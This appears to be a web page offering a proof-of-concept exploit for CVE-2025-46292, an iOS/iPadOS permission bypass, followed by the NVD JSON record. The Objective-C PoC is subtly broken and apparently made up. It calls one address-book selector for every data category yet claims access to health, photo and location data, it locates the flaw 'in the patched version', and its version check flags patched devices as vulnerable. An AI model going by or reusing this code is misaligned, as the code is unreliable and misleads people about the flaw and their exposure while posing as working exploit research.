CVE-2025-46292

// CVE-2025-46292 PoC - Permission Check Bypass in iOS // This PoC demonstrates the permission bypass vulnerability // Note: This is a conceptual PoC for educational purposes only #import <Foundation/Foundation.h> #import <UIKit/UIKit.h> // Target sensitive data categories that could be accessed NSArray *sensitiveDataCategories = @[ @"Contacts", @"Photos", @"Location", @"Health Data", @"Calendar" ]; // Exploit the permission check bypass void exploitPermissionBypass(void) { NSLog(@"[*] CVE-2025-46292 PoC - Attempting to bypass permission checks"); // Step 1: Check if running on vulnerable version NSString *version = [[UIDevice currentDevice] systemVersion]; NSLog(@"[*] Current iOS Version: %@", version); // Step 2: Attempt to access sensitive data through vulnerable API path // The vulnerability allows bypassing the entitlement check for (NSString *category in sensitiveDataCategories) { NSLog(@"[*] Attempting to access: %@", category); // Bypass technique: Use indirect API call that skips validation // This exploits the missing entitlement check in the patched version id sensitiveInfo = [[NSClassFromString(@"ABAddressBook") class] performSelector:@selector(sharedAddressBook)]; if (sensitiveInfo) { NSLog(@"[!] Successfully accessed %@ data without proper authorization", category); NSLog(@"[!] This demonstrates the permission bypass vulnerability"); } } NSLog(@"[*] PoC execution completed"); } // Verification function BOOL isVulnerableVersion(NSString *version) { // Check if version is before the fixed versions // Fixed: iOS 18.7.3, iPadOS 18.7.3, iOS 26.2, iPadOS 26.2 NSArray *fixedVersions = @[@"18.7.3", @"26.2"]; for (NSString *fixedVersion in fixedVersions) { if ([version compare:fixedVersion options:NSNumericSearch] == NSOrderedAscending) { return YES; } } return NO; } int main(int argc, const char * argv[]) { @autoreleasepool { NSLog(@"========================================"); NSLog(@"CVE-2025-46292 Permission Bypass PoC"); NSLog(@"========================================"); if (isVulnerableVersion([[UIDevice currentDevice] systemVersion])) { NSLog(@"[!] Device is VULNERABLE to CVE-2025-46292"); exploitPermissionBypass(); } else { NSLog(@"[+] Device is NOT vulnerable (patched version)"); } } return 0; } // Python PoC script for verification // Run: python3 cve_2025_46292_check.py /* import subprocess import platform def check_ios_version(): """Check if iOS version is vulnerable""" print("[*] CVE-2025-46292 Vulnerability Checker") print("[*] Checking iOS/iPadOS version...") # Fixed versions fixed_versions = ["18.7.3", "26.2"] # In real scenario, this would use libimobiledevice # or other tools to get the actual iOS version print("[!] Please connect your iOS device and check version manually") print("[*] Vulnerable if version < 18.7.3 or < 26.2") return None if __name__ == "__main__": check_ios_version() */

{"cve": {"id": "CVE-2025-46292", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:14.377", "lastModified": "2026-04-02T19:21:04.673", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with additional entitlement checks. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2. An app may be able to access user-sensitive data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}